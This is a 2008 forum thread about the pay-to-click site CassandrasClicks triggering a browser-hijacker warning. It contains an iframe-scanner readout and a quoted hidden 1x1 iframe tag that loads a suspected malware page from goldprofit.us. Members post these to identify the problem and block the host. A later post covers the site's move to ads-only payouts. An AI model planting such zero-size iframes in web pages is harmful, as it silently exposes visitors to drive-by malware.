Help - Search - Members - Calendar
Full Version: [Resolved] CassandrasClicks
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Others
trulyfair
I just visited the home page of CassandrasClicks when Spybot gave the following message:

QUOTE
Spybot - Search & Destroy has detected an important registry entry that has been changed.

Category: Browser Helper Object
Change: Value added


I denied the change but it looks like the site has some sort of browser hijacker. Can anyone identify?

TIA

ETA: I ran the URL through Jutaky's Detektor but I'm still unsure!

CODE
Total zeroiframes found: 1

Check took 2.19 seconds

(Level: 0) Url checked:
[url="http://htxtp://www.cassandrasclicks.com/pages/index.php?refid="]http://www.cassandrasclicks.com/pages/index.php?refid=[/url]
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 1) Url checked: (iframe source)
[url="http://hxttp://cpm-traffic.com/show.php?z=6&pl=170"]http://cpm-traffic.com/show.php?z=6&pl=170[/url]
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
[url="http://hxttp://ad.media-servers.net/st?ad_type=iframe&ad_size=728x90&section=188258"]http://ad.media-servers.net/st?ad_type=ifr...;section=188258[/url]
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
[url="http://htxtp://ad.media-servers.net/+rm_url+"]http://ad.media-servers.net/+rm_url+[/url]
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
[url="http://htxtp://goldprofit.us/flash1x1.html"]http://goldprofit.us/flash1x1.html[/url]
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
[url="http://htxtp://goldprofit.us/ac_runactivecontent.js"]http://goldprofit.us/ac_runactivecontent.js[/url]
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (meta refresh)
content=0.3;http://host.atwebpages.com/
Blank page / could not connect

(Level: 1) Url checked: (iframe source)
[url="http://hxttp://cpm-traffic.com/show.php?z=1&pl=169"]http://cpm-traffic.com/show.php?z=1&pl=169[/url]
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
[url="http://htxtp://www.popuptraffic.com/assign.php?l=lroy89&mode=behind&onclick=1"]http://www.popuptraffic.com/assign.php?l=l...d&onclick=1[/url]
Blank page / could not connect


Edited to change quote tags to code tags
wagdoll
It looks like it's probably come from that goldprofit line. I've sent a contact form to Cassandra's. If you use adblock then add *goldprofit.us* to that as a precaution, or add it to your hosts file and that will stop it loading if you come across that elsewhere. It look like it's probably been hacked on, so other sites might be affected by the same thing in future.

This is the code on Cassandra's that I think is hacker code and contains the BHO and/or trojan

CODE
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC="http://goldprofit.us/flash1x1.html"></IFRAME>


BTW If you can edit the quote tags around the Jutaky readout to switch them to CODE tags that will prevent the links being clickable.
trulyfair
QUOTE (wagdoll @ May 23 2008, 11:32 PM) *
BTW If you can edit the quote tags around the Jutaky readout to switch them to CODE tags that will prevent the links being clickable.

Thanks, wagdoll, I will do that. 206.gif
wagdoll
It looks like this has been fixed. I visited the site today and that 0 iframe is gone.
dabest
forget cassandra's clicks! theyre finished. my account is up to $21.24 and a lot of that was made when i was an upgraded member. now i am not going to get paid! im furious. im not interested in ads, i want my cash!

here is what she has now put as a message with one of the mails. as far as im concerned this site is a scam now. it used to be so good and im very disappointed!

Administrative Message #91 - Changes to Site

--------------------------------------------------------------------------------
As all of you are aware, the site has slowed right down to the point where there is not money coming
in and payouts are behind.

I have thought about this for awhile and have come to the decision that the only way that Cassandra's
can survive at this point is the go over to an Ads Only site.

I am hoping this will be only a temporary situation.

I don't want to close the site but under the circumstances I have one of two choices:

Change to ads only which will allow you all the chance to use your earnings for advertising your other
programs...... OR

Close the site, in which case you would lose totally.

I know this is not what you all want to hear but there is nothing else that can be done at this point in time.

I will be redoing the redemption page to offer more choices of advertising for you.

The page will be temporary offline while I do this.

I Thank All of You for being patient with the site during all of this and with my husband's medical condition. I appreciate all of the kind emails I received about him.

--------------------------------------------------------------------------------


*Please click "Continue" when you are finished reading this message.



Return to the Index
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.